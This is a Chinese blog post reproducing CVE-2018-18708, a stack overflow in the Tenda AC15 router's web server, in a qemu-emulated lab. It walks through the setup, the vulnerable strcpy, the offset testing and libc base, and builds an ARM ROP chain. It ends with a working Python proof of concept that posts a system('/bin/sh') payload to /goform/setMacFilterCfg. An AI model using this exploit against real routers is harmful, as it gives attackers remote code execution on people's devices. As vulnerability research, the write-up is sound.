<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="Thir0th"><meta name="copyright" content="Thir0th"><meta name="generator" content="Hexo 7.3.0"><meta name="theme" content="hexo-theme-yun"><title>Tenda_AC15漏洞复现 | Thir0th's Blog</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"www.thir0th.xyz","root":"/","title":"且行且忘且随风","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="Tenda_AC15漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="Tenda_AC15漏洞复现">
<meta property="og:url" content="https://www.thir0th.xyz/2025/07/19/2025-07-19-Tenda_AC15%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="Thir0th&#39;s Blog">
<meta property="og:description" content="Tenda_AC15漏洞复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718185210-lu0v8a3.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718184401-sit96tk.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718185709-wifyrru.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718185824-i2b84r4.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718190432-1sw8xak.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718190459-r03hegs.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718190730-2q5qi77.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718202311-acj5gsw.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718191357-b4thcl7.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718192105-w0dmcu7.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718192905-hkr5qd0.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718193132-e13zei1.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718193224-20b45o7.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718204857-h0tnm07.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203426-dhb45o3.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203536-9a2i3fk.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203731-6nqcjbk.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203816-gaw9i98.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718210252-9edn6gu.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718210351-e8pjw7a.png">
<meta property="article:published_time" content="2025-07-19T09:00:00.000Z">
<meta property="article:modified_time" content="2025-07-19T09:03:02.225Z">
<meta property="article:author" content="Thir0th">
<meta property="article:tag" content="IOT">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718185210-lu0v8a3.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="Thir0th"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="Thir0th"><span class="site-author-status" title="人生如戏">🧐</span></a><div class="site-author-name"><a href="/about/">Thir0th</a></div><span class="site-name">Thir0th's Blog</span><sub class="site-subtitle"></sub><div class="site-description">且行且忘且随风</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">22</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">7</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">5</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Tenda-AC15%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E-CVE-2018-18708"><span class="toc-number">1.</span> <span class="toc-text">Tenda AC15栈溢出漏洞(CVE-2018-18708)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">2.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">3.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">5.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95%E5%81%8F%E7%A7%BB"><span class="toc-number">5.1.</span> <span class="toc-text">测试偏移</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%A1%E7%AE%97libc-base"><span class="toc-number">5.2.</span> <span class="toc-text">计算libc_base</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0ROP%E9%93%BE"><span class="toc-number">5.3.</span> <span class="toc-text">构造ROP链</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-number">5.4.</span> <span class="toc-text">POC</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">6.</span> <span class="toc-text">总结</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://www.thir0th.xyz/2025/07/19/2025-07-19-Tenda_AC15%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Thir0th"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Thir0th's Blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">Tenda_AC15漏洞复现</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2025-07-19 17:00:00" itemprop="dateCreated datePublished" datetime="2025-07-19T17:00:00+08:00">2025-07-19</time></div><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/Router/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">Router</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/IOT/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">IOT</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><span id="more"></span>

<h1 id="Tenda-AC15栈溢出漏洞-CVE-2018-18708"><a href="#Tenda-AC15栈溢出漏洞-CVE-2018-18708" class="headerlink" title="Tenda AC15栈溢出漏洞(CVE-2018-18708)"></a>Tenda AC15栈溢出漏洞(CVE-2018-18708)</h1><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近开始学习复现Tenda的漏洞，发现很多洞都是一系列的栈溢出漏洞，这些洞的固态仿真都是一样的，函数调用流程是不一样的，但对于pwn手来说，个人感觉最难的还是固态仿真和调试，这些都一样的话，函数流程逐个分析都可以拿下</p>
<p>具体分析一下CVE-2018-18708</p>
<p>CVE-2018-18708，多款Tenda产品中的httpd存在缓冲区溢出漏洞。攻击者可利用该漏洞造成拒绝服务（覆盖函数的返回地址）。以下产品和版本受到影响：Tenda AC7 V15.03.06.44_CN版本；AC9 V15.03.05.19(6318)_CN版本；AC10 V15.03.06.23_CN版本；AC15 V15.03.05.19_CN版本；AC18 V15.03.05.19(6318)_CN版本。</p>
<p>固件下载地址：<a target="_blank" rel="noopener" href="https://www.tenda.com.cn/material">https://www.tenda.com.cn/material</a></p>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><p>拿到.bin文件，binwalk分离一下，二进制文件是.&#x2F;bin&#x2F;httpd，ida逆向查看源码，</p>
<p>首先将qemu-arm-static复制到squashfs-root目录下</p>
<p>直接利用qemu来运行试一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cp $(which qemu-arm-static) .</span><br><span class="line"></span><br><span class="line">sudo chroot . ./qemu-arm-static bin/httpd</span><br></pre></td></tr></table></figure>

<p>这里运行到welcome to..就卡住了</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718185210-lu0v8a3.png" alt="image" loading="lazy"></p>
<p>这里需要patch一下，这两个函数根据意思可以猜测一下，一个是检查网络，一个是链接的</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718184401-sit96tk.png" alt="image" loading="lazy"></p>
<p>改为mov r3,#1,然后将httpd替换，注意修改权限</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718185709-wifyrru.png" alt="image" loading="lazy"></p>
<p>还有一个页面无法显示的问题，实际上就是webroot没有东西，webroot_ro是备份，将webroot_ro换一下名字即可</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718185824-i2b84r4.png" alt="image" loading="lazy"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718190432-1sw8xak.png" alt="image" loading="lazy"></p>
<p>环境成功搭建</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718190459-r03hegs.png" alt="image" loading="lazy"></p>
<p>笔者这边ip已经转发到bro网卡了，所以没用遇到监听ip错误问题，遇到的师傅可以看下别的文章</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718190730-2q5qi77.png" alt="image" loading="lazy"></p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p>函数调用流程是sub_2E420(main)-&gt;sub_2E9EC()-&gt;sub_42378()-&gt;formSetMacFilterCfg-&gt;sub_C14DC-&gt;sub_C17A0-&gt;sub_C24C0</p>
<p>sub_42378可以理解为他要执行的功能，和Dlink中的main中对应不同的web服务异曲同工</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718202311-acj5gsw.png" alt="image" loading="lazy"></p>
<p>漏洞点在formSetMacFilterCfg函数中,触发点在sub_C24C0中</p>
<p>s2_1,s2通过sub_2BA8C进行传参，该函数实际为websGetVar()函数，这两个参数分别是macFilterType和deviceList的参数</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718191357-b4thcl7.png" alt="image" loading="lazy"></p>
<p>sub_C10D0(s2_1) 查看此函数</p>
<p>该函数是用来判断传入的macFilterType参数是否符合要求(macFilterType=black或者macFilterType=white），返回0则代表正确，会进入到下述代码的else判断，从而才能进入到v19 = sub_C14DC(v18, v17);</p>
<p>接下来进入到v19 = sub_C14DC(v18, v17); v17是我们主要关注对象(v18实际上是macFilterType，因为上面我们分析过，该参数必须是white和black，写死了，并不能作为溢出点)，该参数为deviceList</p>
<p>漏洞在于s2，这个参数没有任何限制，也是我们要重点关注的</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718192105-w0dmcu7.png" alt="image" loading="lazy"></p>
<p>然后s经sub_C17A0传入sub_C24C0(s, src);</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718192905-hkr5qd0.png" alt="image" loading="lazy"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718193132-e13zei1.png" alt="image" loading="lazy"></p>
<p>这里strcpy直接将s copy给src+32，这里就是漏洞触发点，这里可以控制返回地址，进而getshell</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718193224-20b45o7.png" alt="image" loading="lazy"></p>
<p>引用：</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718204857-h0tnm07.png" alt="image" loading="lazy">​	</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><h2 id="测试偏移"><a href="#测试偏移" class="headerlink" title="测试偏移"></a>测试偏移</h2><p>优先选择cyclic</p>
<p>需要开三个终端</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">第一个</span><br><span class="line">sudo chroot . ./qemu-arm-static -g 1234 ./bin/httpd</span><br><span class="line">转发端口1234</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">第二个</span><br><span class="line">用gdb-multiarch进行调试</span><br><span class="line">gdb-multiarch -x mygdb.sh</span><br><span class="line"></span><br><span class="line">target remote :1234</span><br><span class="line">file ./bin/httpd</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">第三个</span><br><span class="line">python3 1.py</span><br><span class="line">import requests</span><br><span class="line">from pwn import * </span><br><span class="line"></span><br><span class="line">url = &quot;http://192.168.87.135/goform/setMacFilterCfg&quot;</span><br><span class="line">cookie = &#123;&quot;Cookie&quot;:&quot;password=1234111115&quot;&#125;</span><br><span class="line">data = &#123;&quot;macFilterType&quot;: &quot;white&quot;, &quot;deviceList&quot;: b&quot;\r&quot;+ cyclic(500)&#125;</span><br><span class="line"></span><br><span class="line">response = requests.post(url, cookies=cookie, data=data)</span><br><span class="line">response = requests.post(url, cookies=cookie, data=data)</span><br><span class="line">response = requests.post(url, cookies=cookie, data=data)</span><br><span class="line">print(response.text)</span><br></pre></td></tr></table></figure>

<p>这里需要多发送几遍，Tenda的通病</p>
<p>这里偏移测出来是176</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203426-dhb45o3.png" alt="image" loading="lazy"></p>
<h2 id="计算libc-base"><a href="#计算libc-base" class="headerlink" title="计算libc_base"></a>计算libc_base</h2><p>vmmap是拿不到的，这里还有很多方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203536-9a2i3fk.png" alt="image" loading="lazy"></p>
<p>可以在puts下断点，此时可以得到puts的函数地址，然后减去libc.so.0中的偏移0xff5c1cd4</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203731-6nqcjbk.png" alt="image" loading="lazy"></p>
<p>0x35CD4<br>​<img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718203816-gaw9i98.png" alt="image" loading="lazy"></p>
<p>libc_base&#x3D;0xff5c1cd4-0x35CD4&#x3D;0xff58c000</p>
<h2 id="构造ROP链"><a href="#构造ROP链" class="headerlink" title="构造ROP链"></a>构造ROP链</h2><p>这里先补充一些知识</p>
<p>寄存器：</p>
<p>r0：ARM架构中用于传递函数第一个参数（如 system(“&#x2F;bin&#x2F;sh”) 中的 “&#x2F;bin&#x2F;sh” 地址）。</p>
<p>r3：通用寄存器，此处用于暂存 system 函数地址。</p>
<p>pc：程序计数器，指向下一条要执行的指令地址。通过控制 pc，可以劫持程序流。</p>
<p>‍</p>
<p>CPSR的T位<br>作用：CPSR寄存器的T位（Thumb模式标志位）决定CPU执行模式：<br>T&#x3D;0：执行ARM指令（4字节对齐）。<br>T&#x3D;1：执行Thumb指令（2字节对齐）。<br>影响：<br>若跳转到Thumb指令（如 system 函数是Thumb模式），地址需为奇数（如 0xdeadbeef | 1）。<br>例如：system 地址为 0x5A270（Thumb模式），则实际跳转地址应为 0x5A271。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p/t $cpsr</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718210252-9edn6gu.png" alt="image" loading="lazy"></p>
<p>1100 0000 0000 0000 0000 0000 0010 0000 ，从右向左第五组0000即为T位，此时是0，所以不需要对system地址增加</p>
<p>‍</p>
<p>gadget1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ./lib/libc.so.0 --only &quot;pop&quot;| grep r3</span><br><span class="line">0x00018298 : pop &#123;r3, pc&#125;</span><br></pre></td></tr></table></figure>

<p>gadget2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ./lib/libc.so.0  | grep &quot;mov r0, sp&quot;</span><br><span class="line">0x00040cb8 : mov r0, sp ; blx r3</span><br></pre></td></tr></table></figure>

<p>利用gadget1，将r3传入system，将pc传入gadget2，同时ROP链最后+&#x2F;bin&#x2F;sh字符串，此时&#x2F;bin&#x2F;sh字符串在栈顶sp，sp指向&#x2F;bin&#x2F;sh字符串，sp被赋给r0，也就是第一个参数指向&#x2F;bin&#x2F;sh，r3为system，即可执行system(&#x2F;bin&#x2F;sh)；来getshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line"></span><br><span class="line">gadget1=pop &#123;r3,pc&#125;</span><br><span class="line">gadget2=mov r0, sp ; blx r3</span><br><span class="line">ROP:gadget1+system+gadget2+b&#x27;/bin/sh\x00&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = </span><br><span class="line">    b&#x27;A&#x27; * 溢出偏移      # 填充至返回地址前</span><br><span class="line">    + p32(gadget1_addr) # pop &#123;r3, pc&#125;</span><br><span class="line">    + p32(system_addr)  # 存入 r3</span><br><span class="line">    + p32(gadget2_addr) # 跳转到 gadget2</span><br><span class="line">    + b&quot;/bin/sh\x00&quot;    # 字符串参数（通过 r0 传递）</span><br></pre></td></tr></table></figure>

<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">#cmd = &quot;echo PWN!&quot;</span><br><span class="line"></span><br><span class="line">cmd = b&quot;/bin/sh&quot;</span><br><span class="line">libc_base = 0xff58c000</span><br><span class="line">system = libc_base + 0x5A270</span><br><span class="line">mov_r0_ret_r3 = libc_base + 0x40cb8</span><br><span class="line">pop_r3 = libc_base + 0x18298</span><br><span class="line"></span><br><span class="line">payload = b&#x27;a&#x27;*176</span><br><span class="line">#payload+= str(p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3)).encode() + cmd</span><br><span class="line">#payload+= str((p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3)),encoding=&quot;utf-8&quot;) + cmd</span><br><span class="line">payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd</span><br><span class="line"></span><br><span class="line">url = &quot;http://192.168.87.135/goform/setMacFilterCfg&quot;</span><br><span class="line"></span><br><span class="line">cookie = &#123;&quot;Cookie&quot;:&quot;password=12345&quot;&#125;</span><br><span class="line">data = &#123;&quot;macFilterType&quot;: &quot;black&quot;, &quot;deviceList&quot;: b&quot;\r&quot; + payload&#125;</span><br><span class="line">response = requests.post(url, cookies=cookie, data=data)</span><br><span class="line">response = requests.post(url, cookies=cookie, data=data)</span><br><span class="line">print(response.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>成功getshell</p>
<p><img src="https://cdn.jsdelivr.net/gh/Thir0th/blog-image/image-20250718210351-e8pjw7a.png" alt="image" loading="lazy"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>Tenda这个栈溢出漏洞基本都是通用的，刚兴趣的师傅可以去复现一下Tenda AC9(CVE-2018-18708)</p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">I'm so cute. Please give me money.</div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Thir0th</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://www.thir0th.xyz/2025/07/19/2025-07-19-Tenda_AC15%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="Tenda_AC15漏洞复现">https://www.thir0th.xyz/2025/07/19/2025-07-19-Tenda_AC15%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2025/07/21/2025-07-21-2025%E5%BE%A1%E7%BD%91%E6%9D%AF%E5%86%B3%E8%B5%9B-%E5%BA%94%E6%80%A5%E7%AF%87/" rel="prev" title="2025御网杯决赛-应急篇"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">2025御网杯决赛-应急篇</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2025/06/29/2025-06-29-%E7%9F%A5%E6%94%BB%E5%96%84%E9%98%B2%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0-web/" rel="next" title="Zgsf-Web"><span class="post-nav-text">Zgsf-Web</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2026 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> Thir0th</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.3.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
